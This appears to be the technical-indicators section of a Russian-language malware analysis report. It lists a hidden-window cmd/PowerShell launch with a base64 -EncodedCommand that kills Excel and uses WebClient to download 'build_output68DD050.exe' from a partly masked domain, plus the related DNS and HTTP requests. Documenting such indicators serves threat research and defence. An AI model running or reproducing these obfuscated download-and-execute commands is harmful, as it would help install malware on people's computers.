Техническая информация
- '<SYSTEM32>\cmd.exe' & /K CD C: & PowerShell -EncodedCommand dAByAHkAewBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAa...
- 'et####lprime.com':80
- http://et####lprime.com/aa/build_output68DD050.exe
- http://www.et####lprime.com/aa/build_output68DD050.exe
- DNS ASK et####lprime.com
- '<SYSTEM32>\cmd.exe' & /K CD C: & PowerShell -EncodedCommand dAByAHkAewBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAa...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncodedCommand dAByAHkAewBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAb...